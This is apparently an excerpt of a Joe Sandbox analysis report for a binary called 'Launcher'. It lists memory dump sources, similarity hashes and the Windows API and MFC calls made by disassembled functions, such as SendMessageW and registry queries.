                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3677997916-0
                                                                                                                • Opcode ID: 0a9022ae56c6f43db8d336071df63548467e60d8012da0b95b0b5cf0b2320341
                                                                                                                • Instruction ID: df44898253f5e0e745ea37ed5f21b83f8d3a034864e0a9a0fd25ec94e3d874ff
                                                                                                                • Opcode Fuzzy Hash: 0a9022ae56c6f43db8d336071df63548467e60d8012da0b95b0b5cf0b2320341
                                                                                                                • Instruction Fuzzy Hash: 1CF0B276A0020DFFDF128F90ED09EAE7FB9EB48345F104055FA05A2160E771DA60AB50
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1662#2644
                                                                                                                • String ID:
                                                                                                                • API String ID: 3643970462-0
                                                                                                                • Opcode ID: b2a4955d172f6893873056020b2d99104e7532283901debc0db40684e72d8a1e
                                                                                                                • Instruction ID: b5389f853d1b98ffb678674ec859a3eb18111af3e26843ce700653f0e88193dd
                                                                                                                • Opcode Fuzzy Hash: b2a4955d172f6893873056020b2d99104e7532283901debc0db40684e72d8a1e
                                                                                                                • Instruction Fuzzy Hash: FD416E34A10208EFCB54DF94C596AACBBF2EF44724F6484D8E851AB391CB79AF41DB00
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00B63F53: #303.MFC42U(SysTreeView32,50800000,?,000000FF,?,00B63D6D,F6B930CF,?,00000000,00B70996,000000FF,?,00B62096), ref: 00B63F69
                                                                                                                • #540.MFC42U(F6B930CF,?,00000000,00B70996,000000FF,?,00B62096), ref: 00B63D80
                                                                                                                • #1105.MFC42U(00B65270,000000FF,00000000,00000000,00000004,00000000), ref: 00B63E62
                                                                                                                  • Part of subcall function 00B63CFC: #543.MFC42U(00000000,?,00000000,?,00B63E30), ref: 00B63D0A
                                                                                                                  • Part of subcall function 00B63CFC: InitializeCriticalSection.KERNEL32(00000008,00000000,?,00000000,?,00B63E30), ref: 00B63D19
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1105#303#540#543CriticalInitializeSection
                                                                                                                • String ID:
                                                                                                                • API String ID: 4030040872-0
                                                                                                                • Opcode ID: e5ad5e63bd8afd697d961737ee7bbaef72b03e6bb50e314b524a25c57b871b8a
                                                                                                                • Instruction ID: 04a600b45b27154280f5ff97d0611f5f39d1e377e19fc44a6a5f6fb22c4ad860
                                                                                                                • Opcode Fuzzy Hash: e5ad5e63bd8afd697d961737ee7bbaef72b03e6bb50e314b524a25c57b871b8a
                                                                                                                • Instruction Fuzzy Hash: 82411571E10359DFEB01DF98C856BAEBBF0FB04716F104599E021AB2A1C7B99A44CF54
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _callnewhmalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2285944120-0
                                                                                                                • Opcode ID: 42dd992d449b805a10e81f054b7db909a7b89bb086b073c0934b2cc9592ffe85
                                                                                                                • Instruction ID: 9cff8361b7e7644f470f4f32217cd0391bf9cbe35f6c813721eef5edea4c8036
                                                                                                                • Opcode Fuzzy Hash: 42dd992d449b805a10e81f054b7db909a7b89bb086b073c0934b2cc9592ffe85
                                                                                                                • Instruction Fuzzy Hash: 99D0A932B0052B234E312599EC008ABBAC8DF93BB031500B2F80C9E711EE2ACE2082C0
                                                                                                                APIs
                                                                                                                • #4704.MFC42U ref: 00B695D5
                                                                                                                  • Part of subcall function 00B5B421: #1172.MFC42U(?,00B5B338), ref: 00B5B424
                                                                                                                  • Part of subcall function 00B69597: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B695A0
                                                                                                                  • Part of subcall function 00B69597: #2855.MFC42U(00000000), ref: 00B695A7
                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B695FC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#1172#2855#4704
                                                                                                                • String ID:
                                                                                                                • API String ID: 854760084-0
                                                                                                                • Opcode ID: 91cf4c3cf39fa6eb2dda7f88c26ae0c4f287efa9119d112dcfe35186a2222195
                                                                                                                • Instruction ID: ae5cc367250af4e3135357433aead74121dbb66c3bec9b92b5ab17782419074a
                                                                                                                • Opcode Fuzzy Hash: 91cf4c3cf39fa6eb2dda7f88c26ae0c4f287efa9119d112dcfe35186a2222195
                                                                                                                • Instruction Fuzzy Hash: 3AD0C7312212101BE3216B70EC09FAA26CEEF85320F0600E0BA0ACB0A2CF60CC008700
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4435
                                                                                                                • String ID:
                                                                                                                • API String ID: 3199213920-0
                                                                                                                • Opcode ID: 37cebb649b83f9d3a2e3d9a1ff4105d30cf848280559721bff4f1122886bc9cf
                                                                                                                • Instruction ID: 3bae0a13bb774106b1f7cb05aa54e0e41a68141775f4de4165c9f03c56ec6fa7
                                                                                                                • Opcode Fuzzy Hash: 37cebb649b83f9d3a2e3d9a1ff4105d30cf848280559721bff4f1122886bc9cf
                                                                                                                • Instruction Fuzzy Hash: F701A23570015A9BDF189B15C844BB9BBA5FB84322F4440BBEC0A87391CB309D51CB91
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 00B5EAB7
                                                                                                                  • Part of subcall function 00B6DE06: malloc.MSVCRT ref: 00B6DE1E
                                                                                                                  • Part of subcall function 00B5EAE6: __EH_prolog3.LIBCMT ref: 00B5EAED
                                                                                                                  • Part of subcall function 00B5EAE6: #338.MFC42U(0000000C,00B5EAD7,00000004), ref: 00B5EAF7
                                                                                                                  • Part of subcall function 00B5EAE6: #540.MFC42U(0000000C,00B5EAD7,00000004), ref: 00B5EB0B
                                                                                                                  • Part of subcall function 00B5EAE6: #860.MFC42U(00B5349E,0000000C,00B5EAD7,00000004), ref: 00B5EB27
                                                                                                                  • Part of subcall function 00B5EAE6: #540.MFC42U ref: 00B5EB36
                                                                                                                  • Part of subcall function 00B5EAE6: #540.MFC42U ref: 00B5EB42
                                                                                                                  • Part of subcall function 00B5EAE6: #4155.MFC42U(00000004), ref: 00B5EB50
                                                                                                                  • Part of subcall function 00B5EAE6: #4155.MFC42U(00000008,00000004), ref: 00B5EB5A
                                                                                                                  • Part of subcall function 00B5EAE6: #3516.MFC42U(?,?,00000005,00000008,00000004), ref: 00B5EB6E
                                                                                                                  • Part of subcall function 00B5EAE6: #861.MFC42U(ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00B5EB7E
                                                                                                                  • Part of subcall function 00B5EAE6: #3516.MFC42U(?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00B5EB8D
                                                                                                                  • Part of subcall function 00B5EAE6: #861.MFC42U(ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00B5EB9D
                                                                                                                  • Part of subcall function 00B5EAE6: #3516.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00B5EBAC
                                                                                                                  • Part of subcall function 00B5EAE6: #800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00B5EBB7
                                                                                                                  • Part of subcall function 00B5EAE6: #800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00B5EBBF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #3516#540$#4155#800#861H_prolog3$#338#860malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1769621591-0
                                                                                                                • Opcode ID: 2a84a757b8b6591b091951ec04e0ff8a9ff411d050e8004ed39b4eb4599c213d
                                                                                                                • Instruction ID: 8514f799a6ca38ed384615a556283b2783ab3d37efcb29e3b3121e9b2861c93a
                                                                                                                • Opcode Fuzzy Hash: 2a84a757b8b6591b091951ec04e0ff8a9ff411d050e8004ed39b4eb4599c213d
                                                                                                                • Instruction Fuzzy Hash: E5D0C7A2B4510397DF1CB7B4151272D15D1AF44301F5044FDB554D5381DE64C6448555
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 00B60D67
                                                                                                                  • Part of subcall function 00B6DE06: malloc.MSVCRT ref: 00B6DE1E
                                                                                                                  • Part of subcall function 00B61536: __EH_prolog3.LIBCMT ref: 00B6153D
                                                                                                                  • Part of subcall function 00B61536: #366.MFC42U(00000004,00B60D8A,00000004), ref: 00B61547
                                                                                                                  • Part of subcall function 00B61536: #527.MFC42U(00000004,00B60D8A,00000004), ref: 00B6155C
                                                                                                                  • Part of subcall function 00B61536: #529.MFC42U(00000004,00B60D8A,00000004), ref: 00B6156B
                                                                                                                  • Part of subcall function 00B61536: #554.MFC42U(00000004,00B60D8A,00000004), ref: 00B6157A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3$#366#527#529#554malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3012659443-0
                                                                                                                • Opcode ID: 72c55dcd6e3f0c4e6d336ec75686d67ad851c60acf5eef45d6b3a53ed2550917
                                                                                                                • Instruction ID: 0d3293f891f28759bb59c5ad450cfa601800d70c89eb65c14df18d435170b09d
                                                                                                                • Opcode Fuzzy Hash: 72c55dcd6e3f0c4e6d336ec75686d67ad851c60acf5eef45d6b3a53ed2550917
                                                                                                                • Instruction Fuzzy Hash: F3D022F2B04203A7DF08FBFC681232E10D09F40300F5044FEB649CA3C2DE388A008629
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #439
                                                                                                                • String ID:
                                                                                                                • API String ID: 466583480-0
                                                                                                                • Opcode ID: ac5ae85a6b662794a616c032d368acdeee14c1140717a80183b93a84f1882932
                                                                                                                • Instruction ID: fed887c450457231d6a8bf0d04931aa917330946c1dd08f0de12879cc925df20
                                                                                                                • Opcode Fuzzy Hash: ac5ae85a6b662794a616c032d368acdeee14c1140717a80183b93a84f1882932
                                                                                                                • Instruction Fuzzy Hash: 76C08CB26002A4778B106B4D980688ABADCC9827A431500DAB921A7300EBF0DE4183E5
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4146
                                                                                                                • String ID:
                                                                                                                • API String ID: 1848845558-0
                                                                                                                • Opcode ID: db260932d695573c051feaa346e26578e55ea5e1411149e61a8cf7a75880d7ed
                                                                                                                • Instruction ID: 0aa10be72865a5a4d7a7fcaff5a0f634a081da46fc9213c0092fb1c669b185de
                                                                                                                • Opcode Fuzzy Hash: db260932d695573c051feaa346e26578e55ea5e1411149e61a8cf7a75880d7ed
                                                                                                                • Instruction Fuzzy Hash: 69C0123700014DBBCF015E55DC01C9A3BA9EF40320B004000FC3845161CB72D830A660
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wgetmainargs
                                                                                                                • String ID:
                                                                                                                • API String ID: 1709950718-0
                                                                                                                • Opcode ID: ac48f9eac94875449b89007c16b1bc291496b7f7ed8dfc4444a86026fa84d02b
                                                                                                                • Instruction ID: 1ee616eef60b2fc69b4be53e4c873a3be5c142771c86a2de50fdad1b36ea7e32
                                                                                                                • Opcode Fuzzy Hash: ac48f9eac94875449b89007c16b1bc291496b7f7ed8dfc4444a86026fa84d02b
                                                                                                                • Instruction Fuzzy Hash: 9AD0C271AC0642BF8644DB54AC4781A3AE8A614F067058095F5AD63571DBE387D0BB51
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000000B,?,00000000), ref: 00B5E19A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 4c6d70049b8a5fea39d6452274362375c35d7c4ac4cf219c880d1f3d7eaf60bd
                                                                                                                • Instruction ID: f600aeab75c3055fad5d51c8890791f014e5b63ba1ec80b847d9ec6e6e13dd80
                                                                                                                • Opcode Fuzzy Hash: 4c6d70049b8a5fea39d6452274362375c35d7c4ac4cf219c880d1f3d7eaf60bd
                                                                                                                • Instruction Fuzzy Hash: 36C09B73140208B7D7221B51DC05F867F69E795762F514011F71C1D0B18F739871D654
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001102,00000000,00000003), ref: 00B655F7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 71cc1bfd1f09b5b5e4394b08ccc46322cf5f84278e5a47e18545835bc9e4540f
                                                                                                                • Instruction ID: 2c87578d510f863e69c491da9ae4f4fd9a23f3d0ff5fff06bde2464f6bd33ea5
                                                                                                                • Opcode Fuzzy Hash: 71cc1bfd1f09b5b5e4394b08ccc46322cf5f84278e5a47e18545835bc9e4540f
                                                                                                                • Instruction Fuzzy Hash: 98C04C37040108BBDB065F91DC09CC57F6AFB99762B518011F65C090718B7399B1EB50
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,00B64852), ref: 00B67F1D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 6085bab19e5e1048ef3a05cefd005aea3e35859ef721058e930dd07edea72807
                                                                                                                • Instruction ID: c577ac7598337293c2b2cd0998a64c0d9f95a0a8decb6a4feb2f20c90cb0a64f
                                                                                                                • Opcode Fuzzy Hash: 6085bab19e5e1048ef3a05cefd005aea3e35859ef721058e930dd07edea72807
                                                                                                                • Instruction Fuzzy Hash: 3BC04C72180208BBD6155B51DC05FC57E6AE795762F514011F718190A18B7399619654
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1874612386.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7be0000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f38b45e75159ae26ad336c450694e2578a304413fc4e4367f4e1f106856abe1b
                                                                                                                • Instruction ID: aeaecf47476aa4370342bcd2078920b4943ac3098c73927f16800b0f0b5f7d6d
                                                                                                                • Opcode Fuzzy Hash: f38b45e75159ae26ad336c450694e2578a304413fc4e4367f4e1f106856abe1b
                                                                                                                • Instruction Fuzzy Hash: 85D05E6020C3C48FD31327B4B6291A93F598FDB105F0504AED18A8B1C2CE0814018393
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1874612386.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7be0000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e8634f3c188c206b9316f6687aa2eddf7efea35669060164a2ceb14116244fa9
                                                                                                                • Instruction ID: 9a89118eac63b4722f7032110a3a98fc8108d54b1fc0bdde3939178d51b1db8f
                                                                                                                • Opcode Fuzzy Hash: e8634f3c188c206b9316f6687aa2eddf7efea35669060164a2ceb14116244fa9
                                                                                                                • Instruction Fuzzy Hash: 0421A070700309CFEB05EB78D5147AE7AABEB89300F20446CD105B77A5DFBAAC458BA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1874409247.0000000007B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B9D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7b9d000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9e85f8b874860182e10aba08e8d85af190a84f29f14d10313d8ad3742824e32a
                                                                                                                • Instruction ID: 64053eb1355fb6333d7b82234e217d9154a45086824fd5e396d4714fe3182314
                                                                                                                • Opcode Fuzzy Hash: 9e85f8b874860182e10aba08e8d85af190a84f29f14d10313d8ad3742824e32a
                                                                                                                • Instruction Fuzzy Hash: F11126F1744340DFEF50EF25DA84B26BBA4EB44314F208ABDD4494B241C33AD447C662
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1874409247.0000000007B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B9D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7b9d000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 22b937e05fecc0cfe411fbdde06990dad91a5034404c6a0e0e5cb49c6082c870
                                                                                                                • Instruction ID: dee44567f24b7c876b12bb8e799592d15738ed515f9c3e58ad3056b8a79b9ecc
                                                                                                                • Opcode Fuzzy Hash: 22b937e05fecc0cfe411fbdde06990dad91a5034404c6a0e0e5cb49c6082c870
                                                                                                                • Instruction Fuzzy Hash: 7C1173F16097C08FEB16DF24D594715BF71EB41214F2586FAC8898B693C33A944AC762
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1874612386.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7be0000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 85efbf80b31e0e795c1170875d3cc4e390011181a75beee1b804d9191f60547d
                                                                                                                • Instruction ID: ba3275e79bd74944bbab23191b51a3ba61defc0eb219d3a8d0b2227d0f35d111
                                                                                                                • Opcode Fuzzy Hash: 85efbf80b31e0e795c1170875d3cc4e390011181a75beee1b804d9191f60547d
                                                                                                                • Instruction Fuzzy Hash: 391191716003468FDB14EB25E9147EE7BB6EF85304F10096CD0467B3A6DBB86809CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1874612386.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7be0000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 394c6b2db3826c567a24eceffdb8a36319b36e71a328cb1e078e69d09b2eb791
                                                                                                                • Instruction ID: ed6c6f202e3b3f6ea2cc0d6fc0e3467c3ee788fe7acbfefff30b9318ca614900
                                                                                                                • Opcode Fuzzy Hash: 394c6b2db3826c567a24eceffdb8a36319b36e71a328cb1e078e69d09b2eb791
                                                                                                                • Instruction Fuzzy Hash: 99D05E306401458ECF05E6B8A0012DCBB61EF80219F0045AAC105AB181DB67A50A83A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1874612386.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7be0000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: feed0b877999e469a8bbe72babbc8bce006c34f54acce0204063c2ec7a70bfda
                                                                                                                • Instruction ID: dc47bedae5edb5f7f8bf53e32539f603b0d1163cf2d4d3aa1723385b89ec4f70
                                                                                                                • Opcode Fuzzy Hash: feed0b877999e469a8bbe72babbc8bce006c34f54acce0204063c2ec7a70bfda
                                                                                                                • Instruction Fuzzy Hash: 09B012B01403CCCBD24137F6F70E15E375DEB88616B400060EA1EC32819F6D150285A6
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 00B6963E
                                                                                                                • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,0000009C,00B6ACE5,?,?), ref: 00B6966E
                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,?), ref: 00B697A0
                                                                                                                • wsprintfW.USER32 ref: 00B69854
                                                                                                                • wsprintfW.USER32 ref: 00B6986C
                                                                                                                • wsprintfW.USER32 ref: 00B69925
                                                                                                                • wsprintfW.USER32 ref: 00B6993B
                                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 00B69956
                                                                                                                • #538.MFC42U(00000000), ref: 00B6997D
                                                                                                                • #538.MFC42U(00000000,00000000), ref: 00B69996
                                                                                                                • #800.MFC42U(?,?,?,00000000,00000000), ref: 00B699D6
                                                                                                                • #800.MFC42U ref: 00B699EF
